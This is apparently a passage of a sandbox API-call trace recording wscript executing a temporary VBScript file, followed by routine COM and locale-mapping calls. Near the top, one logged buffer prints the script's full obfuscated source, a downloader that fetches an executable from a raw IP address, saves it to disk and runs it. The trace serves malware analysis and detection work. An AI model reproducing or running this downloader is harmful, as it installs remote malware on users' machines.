[0079.486] CoCreateInstance (in: rclsid=0x74fdb234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74fdb244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x832c2c | out: ppv=0x832c2c*=0x449fd8) returned 0x0
[0079.486] IUnknown:AddRef (This=0x449fd8) returned 0x2
[0079.486] GetCurrentProcessId () returned 0x5a8
[0079.486] GetCurrentThreadId () returned 0x6e4
[0079.486] GetTickCount () returned 0x21cb3
[0079.486] ISystemDebugEventFire:BeginSession (This=0x449fd8, guidSourceID=0x74fdb308, strSessionName="VBScript:00001448:00001764:18138419") returned 0x0
[0079.487] GetCurrentThreadId () returned 0x6e4
[0079.487] GetCurrentThreadId () returned 0x6e4
[0079.487] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x11c
[0079.487] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5be
[0079.487] CreateFileMappingA (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5be, lpName=0x0) returned 0x120
[0079.487] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x260000
[0079.489] GetVersionExA (in: lpVersionInformation=0x1eef0c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x75f5b6d0, dwMinorVersion=0x1eef90, dwBuildNumber=0x75f5b72a, dwPlatformId=0x77e3ffa6, szCSDVersion="\x5b\xdb\xf4\x75\x84\xef\x1e") | out: lpVersionInformation=0x1eef0c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0079.489] IsTextUnicode (in: lpv=0x260000, iSize=1470, lpiResult=0x1eefb8 | out: lpiResult=0x1eefb8) returned 0
[0079.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x260000, cbMultiByte=1470, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1470
[0079.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x260000, cbMultiByte=1470, lpWideCharStr=0x459d54, cchWideChar=1470 | out: lpWideCharStr="set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") \r\nDim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x \r\nDim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w \r\nDim B8yU2nW4oD3lW4vO1xP2nY9oR3e \r\nDim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i \r\nX3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" \r\nR2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" \r\nSet B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") \r\nB8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False \r\nB8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") \r\nIf B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then \r\nSet N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 \r\nN9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close \r\nSet nE= Nothing \r\nEnd If \r\nSet B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing \r\nWScript.Sleep(5000) \r\nH2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) \r\n") returned 1470
[0079.489] UnmapViewOfFile (lpBaseAddress=0x260000) returned 1
[0079.489] CloseHandle (hObject=0x120) returned 1
[0079.489] CloseHandle (hObject=0x11c) returned 1
[0079.489] GetSystemDirectoryA (in: lpBuffer=0x1eef7b, uSize=0x0 | out: lpBuffer="") returned 0x14
[0079.489] GetSystemDirectoryA (in: lpBuffer=0x833080, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0079.489] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x76490000
[0079.490] GetProcAddress (hModule=0x76490000, lpProcName="SaferIdentifyLevel") returned 0x764b2102
[0079.490] GetProcAddress (hModule=0x76490000, lpProcName="SaferComputeTokenFromLevel") returned 0x764b3352
[0079.490] GetProcAddress (hModule=0x76490000, lpProcName="SaferCloseLevel") returned 0x764b3825
[0079.491] IdentifyCodeAuthzLevelW () returned 0x1
[0079.810] GetVersionExA (in: lpVersionInformation=0x1ee620*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77e4e026, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ee620*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0079.810] GetUserDefaultLCID () returned 0x409
[0079.811] IsFileSupportedName () returned 0x1
[0079.811] _wcsicmp (_String1=".vbs", _String2=".vBS") returned 0
[0079.816] GetSignedDataMsg () returned 0x0
[0079.816] GetCurrentProcess () returned 0xffffffff
[0079.816] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x120, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1eeb48, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1eeb48*=0x14c) returned 1
[0079.816] GetFileSize (in: hFile=0x14c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5be
[0079.816] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0079.816] ReadFile (in: hFile=0x14c, lpBuffer=0x83e0e0, nNumberOfBytesToRead=0x5be, lpNumberOfBytesRead=0x1eeb1c, lpOverlapped=0x0 | out: lpBuffer=0x83e0e0*, lpNumberOfBytesRead=0x1eeb1c*=0x5be, lpOverlapped=0x0) returned 1
[0079.816] CoInitialize (pvReserved=0x0) returned 0x1
[0079.816] CoCreateInstance (in: rclsid=0x74fa1e54*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74fa1d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x1eeaf4 | out: ppv=0x1eeaf4*=0x83ea08) returned 0x0
[0079.991] __dllonexit () returned 0x74b81815
[0079.991] __dllonexit () returned 0x74b8182f
[0079.991] GetVersionExA (in: lpVersionInformation=0x1ed67c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1ed66c, dwMinorVersion=0x2, dwBuildNumber=0x1f0000, dwPlatformId=0x74b84268, szCSDVersion="\x9c\xd6\x1e") | out: lpVersionInformation=0x1ed67c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0079.991] GetProcessWindowStation () returned 0x48
[0079.991] GetUserObjectInformationA (in: hObj=0x48, nIndex=1, pvInfo=0x1ed66c, nLength=0xc, lpnLengthNeeded=0x1ed678 | out: pvInfo=0x1ed66c, lpnLengthNeeded=0x1ed678) returned 1
[0079.992] DllGetClassObject (in: rclsid=0x458f38*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x75d3ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1edde4 | out: ppv=0x1edde4*=0x832a30) returned 0x0
[0079.992] IClassFactory:CreateInstance (in: This=0x832a30, pUnkOuter=0x0, riid=0x1ee790*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1eddd0 | out: ppvObject=0x1eddd0*=0x83ea08) returned 0x0
[0079.992] GetSystemInfo (in: lpSystemInfo=0x1edd10 | out: lpSystemInfo=0x1edd10*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0079.992] VirtualQuery (in: lpAddress=0x1edd50, lpBuffer=0x1edd34, dwLength=0x1c | out: lpBuffer=0x1edd34*(BaseAddress=0x1ed000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0079.993] IUnknown:AddRef (This=0x83ea08) returned 0x2
[0079.993] IUnknown:Release (This=0x83ea08) returned 0x1
[0079.993] IUnknown:Release (This=0x832a30) returned 0x0
[0079.993] IUnknown:QueryInterface (in: This=0x83ea08, riid=0x74fa1d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1eeac4 | out: ppvObject=0x1eeac4*=0x83ea08) returned 0x0
[0079.993] IUnknown:Release (This=0x83ea08) returned 0x1
[0079.994] _strnicmp (_Str1="?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x06Ā") returned 256
[0081.789] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x06Ā", cchSrc=256, lpCharType=0x3bf21c | out: lpCharType=0x3bf21c) returned 1
[0081.789] GetLastError () returned 0x0
[0081.789] SetLastError (dwErrCode=0x0)
[0081.789] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1
[0081.789] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x3bf61c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0081.789] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x3bf61c, cbMultiByte=256, lpWideCharStr=0x3bef28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ摂ᗂĀ") returned 256
[0081.789] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ摂ᗂĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0081.789] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ摂ᗂĀ", cchSrc=256, lpDestStr=0x3bed18, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256
[0081.789] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x3bf51c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x16\x62\xc2\x15\x54\xf7\x3b", lpUsedDefaultChar=0x0) returned 256
[0081.789] GetLastError () returned 0x0
[0081.789] SetLastError (dwErrCode=0x0)
[0081.789] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x3bf61c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0081.789] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x3bf61c, cbMultiByte=256, lpWideCharStr=0x3bef48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ撢ᗂĀ") returned 256
[0081.790] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ撢ᗂĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0081.790] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ撢ᗂĀ", cchSrc=256, lpDestStr=0x3bed38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256
[0081.790] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x3bf41c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xd